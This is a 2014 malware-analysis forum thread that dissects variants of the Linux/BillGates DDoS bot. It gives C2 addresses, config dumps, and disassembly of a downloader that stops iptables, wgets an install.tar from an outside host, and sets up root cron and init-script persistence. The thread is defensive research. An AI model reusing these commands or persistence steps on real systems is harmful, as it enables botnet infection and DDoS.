Linux/BillGates

Forum for analysis and discussion about malware.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Thu Sep 11, 2014 9:55 pm

Exactly the same variant, with 13 flooders, VT are:
https://www.virustotal.com/en/file/c101 ... 410055879/
https://www.virustotal.com/en/file/e275 ... 409011038/
Same variant as the previously posted, with the below panel:
Image
If you see the dropped encrypted config in the default directory:

Code: Select all

00000000  41 00 00 00 00 f4 01 00  00 32 00 00 00 e8 03 00  |A........2......|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 01 01  |................|
00000020  02 00 00 00 01 00 00 00  4e 2e 25 45 4e 2e 25 45  |........N.%EN.%E|
00000030  4e 2e 25 45 4e 2e 25 45  4e 2e 25 45 ff ff 01 00  |N.%EN.%EN.%E....|
00000040  00 00 00 00 00                                    |.....|
00000045
That is exactly the data sent during initiation protocol to the CNC:
Image
One more drop is in the /tmp contains the parent process ID to be killed.

Code: Select all

$ cat /tmp/gates.note
14018
CNC:

Code: Select all

sa_family=AF_INET, sin_port=htons(15555), sin_addr=inet_addr("183.56.173.50")
IPv4 225523365 0t0 TCP MMD-BANGS-YOU-GOOD.malwaremustdie.org:36345->183.56.173.50:15555 (ESTABLISHED)
Location:
183.56.173.50||4134 | 183.0.0.0/10 | CHINANET | CN | CHINATELECOM.COM.CN | CHINANET GUANGDONG PROVINCE NETWORK 
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Sun Sep 14, 2014 7:57 pm

New sample: https://www.virustotal.com/en/file/8ed3 ... 410634927/
Feel free to contribute to analyze it as per posted previously.
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Thu Sep 18, 2014 6:04 pm

Thank you to anonymous sample contributor.
This is the BillGates sample, age: about 1 week+ ago,
VT: https://www.virustotal.com/en/file/735f ... 410773773/

Slight changes detected in in (project's) source files:

Code: Select all

crtstuff.c
AmpResource.cpp
Attack.cpp
CmdMsg.cpp
ConfigDoing.cpp
DNSCache.cpp
ExChange.cpp
Global.cpp
Main.cpp
Manager.cpp
MiniHttpHelper.cpp
ProtocolUtil.cpp
ProvinceDns.cpp
StatBase.cpp
SysTool.cpp
ThreadAtk.cpp
ThreadClientStatus.cpp
ThreadConnection.cpp
ThreadDoFun.cpp
ThreadFakeDetect.cpp
ThreadHttpGet.cpp
ThreadKillChaos.cpp
ThreadLoopCmd.cpp
ThreadMonGates.cpp
ThreadRecycle.cpp
ThreadShell.cpp
ThreadShellRecycle.cpp
ThreadTask.cpp
ThreadTns.cpp
ThreadUpdate.cpp
UserAgent.cpp
AutoLock.cpp
FileOp.cpp
Ijduy.cpp
Iysd76.cpp
Log.cpp
Md5.cpp
Media.cpp
NetBase.cpp
ThreadCondition.cpp
Thread.cpp
ThreadMutex.cpp
Utility.cpp
WinDefSVC.cpp
and minor updates in symbols used in attack functions:

Code: Select all

11CAttackBase
13CPacketAttack
10CAttackUdp
10CAttackSyn
11CAttackIcmp
10CAttackDns
10CAttackAmp
10CAttackPrx
15CAttackCompress
10CTcpAttack
9CAttackCc
10CAttackTns
9CAttackIe
The other parts seems to be similar as previous ones.

The malware file name is "8520" this is exactly the port number this BillGates used to connect the CNC:

Code: Select all

tagged 0x990 setsockopt(4, SOL_SOCKET, SO_REUSEADDR, [1], 4)
tagged 0x990 setsockopt(4, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8)
tagged 0x990 time(NULL)
tagged 0x990 fcntl64(4, F_GETFL)
tagged 0x990 fcntl64(4, F_SETFL, O_RDWR|O_NONBLOCK)
tagged 0x990 connect(4, {sa_family=AF_INET, sin_port=htons(8520), sin_addr=inet_addr("122.224.48.63")}, 16)
CNC is in here:

Code: Select all

122.224.48.63||4134 | 122.224.0.0/12 | CHINANET | CN | - | MOVEINTERNET NETWORK TECHNOLOGY CO. LTD.
PoC of the ALIVE connection:

Code: Select all

8520 31539 31963   mmd    4u  IPv4 234322113   0t0   TCP MMD-BANGS-YOU:60029->122.224.48.63:8520 (ESTABLISHED)
except the autostart, please aware of these drops:

Code: Select all

 $ mydump /tmp/gates.lod < shows PID..
00000000  33 31 35 33 39                                    |(REDACTED)|
00000005

 $ mydump ./conf.n < Shows initial comm to send to CNC
00000000  45 00 00 00 00 f4 01 00  00 32 00 00 00 e8 03 00  |E........2......|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 01 01  |................|
00000020  02 00 00 00 01 00 00 00  4e 2e 25 45 4e 2e 25 45  |........N.%EN.%E|
00000030  4e 2e 25 45 4e 2e 25 45  4e 2e 25 45 ff ff 01 00  |N.%EN.%EN.%E....|
00000040  00 00 00 00 00 00 00 00  00                       |.........|
00000049

For the evidence of crime :)) this is the DDoS I recorded, see how port 80 & 443 are used for HTTP & HTTPS attack: https://gist.githubusercontent.com/unix ... Record.txt
#MalwareMustDie!
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Fri Sep 19, 2014 12:24 am

1 sample with the age of about 2 month.
https://www.virustotal.com/en/file/8cf9 ... 410791345/
CNC: 162.221.12.154:36000

There is nothing new about the BillGates ELF binary itself, EXCEPT... In this case we spotted accompanied malware sets:
1. The separated ELF downloader+installer(maybe is an updater module) accompanied to above sampes to kill, download & install ELF Billgates sample sets:
https://www.virustotal.com/en/file/050c ... 409678428/
2. The separated ELF backdoor designed to send backdoor of successful infection status to the CNC:
https://www.virustotal.com/en/file/ef15 ... 410919424/

How the downloader/installer work:

It kills these process:

Code: Select all

0x80486BF mov     dword ptr [esp], offset command ; "killall -9 kerne"
0x80486C6 call    _system
0x80486CB mov     dword ptr [esp], offset aKillall9Socket ; "killall -9 socket"
0x80486D2 call    _system
0x80486D7 mov     dword ptr [esp], offset aKillall9Cnet2 ; "killall -9 cnet2"
0x80486DE call    _system
0x80486E3 mov     dword ptr [esp], 0Ah ; seconds // sleep to let the process be killed..
0x80486EA call    _sleep
0x80486EF mov     dword ptr [esp], offset aKillall9Cnet2 ; "killall -9 cnet2"
0x80486F6 call    _system
0x80486FB mov     dword ptr [esp], offset aCdEtcInit_dIpt ; "cd / \n /etc/init.d/iptables stop"
0x8048702 call    _system
0x8048707 mov     dword ptr [esp], offset aServiceIptable ; "service iptables stop"
0x804870E call    _system
download and extract malwares in the /bin:

Code: Select all

0x8048734  mov     dword ptr [esp], offset filename ; "/bin/install.tar"
0x804873B  call    _remove
0x8048740  mov     dword ptr [esp+8], offset downip ; "61.147.103.185:8089"
0x8048748  mov     dword ptr [esp+4], offset format ; "wget -c -P /bin http://%s/install.tar"
0x8048750  lea     eax, [ebp+s]
0x8048756  mov     [esp], eax      ; s
0x8048759  call    _sprintf
0x804875E  lea     eax, [ebp+s]
0x8048764  mov     [esp], eax      ; command
0x8048767  call    _system
0x804876C  mov     dword ptr [esp], offset aTarXfBinInstal ; "tar -xf /bin/install.tar -C /bin/"
0x8048773  call    _system
0x8048778  lea     eax, [ebp+s]
Which it is ALIVE now, PoC:

Code: Select all

--2014-09-19 09:38:06--  h00p://61.147. 103.185:8089/install.tar
Connecting to 61.147.103.185:8089... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1187840 (1.1M) [application/octet-stream]
Saving to: 'install.tar'
100%[===========>] 1,187,840    802KB/s   in 1.4s
2014-09-19 09:38:07 (802 KB/s) - 'install.tar' saved [1187840/1187840]
copy the BillGates binary to the /root..

Code: Select all

0x80487A3  mov     dword ptr [esp+4], offset aSKerne ; "%s/kerne"
0x80487AB  lea     eax, [ebp+s]
0x80487B1  mov     [esp], eax      ; s
0x80487B4  call    _sprintf
0x80487B9  mov     dword ptr [esp+4], offset aRootKerne ; "/root/kerne"
0x80487C1  lea     eax, [ebp+s]
0x80487C7  mov     [esp], eax      ; filename
0x80487CA  call    mycopyfile
chmod 777 those files..

Code: Select all

0x80487CF  mov     dword ptr [esp], offset aChmod0777BinMy ; "chmod 0777 /bin/mysql515"
0x80487D6  call    _system
0x80487DB  mov     dword ptr [esp], offset aChmod0777BinSo ; "chmod 0777 /bin/socket"
0x80487E2  call    _system
0x80487E7  mov     dword ptr [esp], offset aChmod0777BinCn ; "chmod 0777 /bin/cnet2"
0x80487EE  call    _system
0x80487F3  mov     dword ptr [esp], offset aChmod0755RootK ; "chmod 0755 /root/kerne"
0x80487FA  call    _system
0x80487FF  lea     eax, [ebp+s]
uninterruptly-creating an end point of comm/returns a descriptor & delete tar installer:

Code: Select all

0x804884C   mov     dword ptr [esp], offset aNohupBinSocket ; "nohup /bin/socket > /dev/null 2>&1 &"
0x8048853   call    _system
0x8048858   mov     dword ptr [esp], offset filename ; "/bin/install.tar"
0x804885F   call    _remove
install scheduler w/ root permission in crontab:

Code: Select all

0x8048BAC   mov     dword ptr [esp], offset aEtcCrontab ; "/etc/crontab"
0x8048BB3   call    _fopen
      :
0x8048BF2   mov     [esp+8], eax
0x8048BF6   mov     dword ptr [esp+4], offset a55RootSS ; "*/55 * * * * root %s/%s \n"
It installs file "taskgrm-" as the init (autostart files)

Code: Select all

0x8048CEC  ov     dword ptr [esp+4], offset aEtcInit_dTaskg ; "/etc/init.d/taskgrm-"
0x8048CF4  ov     dword ptr [esp], offset aBinTaskgrm ; "/bin/taskgrm-"
0x8048CFB  all    mycopyfile
0x8048D00  ov     dword ptr [esp], offset aChmod777EtcIni ; "chmod 777 /etc/init.d/taskgrm-"
0x8048D07  all    _system
0x8048D0C  ov     dword ptr [esp], offset aLnSEtcInit_dTa ; "ln -s /etc/init.d/taskgrm- /etc/rc.d/rc"...
0x8048D13  all    _system
0x8048D18  ov     dword ptr [esp], offset aChmod777EtcRc_ ; "chmod 777 /etc/rc.d/rc5.d/taskgrm-"
0x8048D1F  all    _system
0x8048D24  ov     dword ptr [esp], offset aChkconfigAddTa ; "chkconfig --add taskgrm-"
0x8048D2B  all    _system
nasty isn't it?
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Fri Sep 19, 2014 4:07 am

Behold.. BillGates for FreeBSD! Wow..these scums seriously want to transform all up *NIX boxes into DDoS army :shock:

Code: Select all

Freebsd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically linked, for FreeBSD 8.4, not stripped
https://www.virustotal.com/en/file/2040 ... 411098480/
Image
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Fri Sep 19, 2014 12:28 pm

Finished categorizing series of infection. Billgates ones are uploaded here.
Image
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Fri Sep 19, 2014 1:27 pm

You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Sat Sep 20, 2014 2:34 am

(Thankfully) someone sent me old sample (age: 2 weeks 3 days ago), not a surprise that I met a dead CNC.
https://www.virustotal.com/en/file/60cf ... 410943627/
CNC: abu2.jack52088.com (115.231.17.13:36665)
We analyze to takedown these CNC, will ignore old samples from now on. rgds
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Sat Sep 20, 2014 5:17 pm

New sample infecting x64 machine: https://www.virustotal.com/en/file/85f8 ... 411229486/
Accompanied by the etc ELf malware supporting hacks (grep PID to kill process, start a process, etc)
https://www.virustotal.com/en/file/552f ... 411225997/
https://www.virustotal.com/en/file/33c1 ... /analysis/
(highlight reversing for the accompanied ELF is written in VT comment)
You do not have the required permissions to view the files attached to this post.

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Linux/BillGates

Post by unixfreaxjp » Sun Sep 21, 2014 7:18 am

You do not have the required permissions to view the files attached to this post.

Post Reply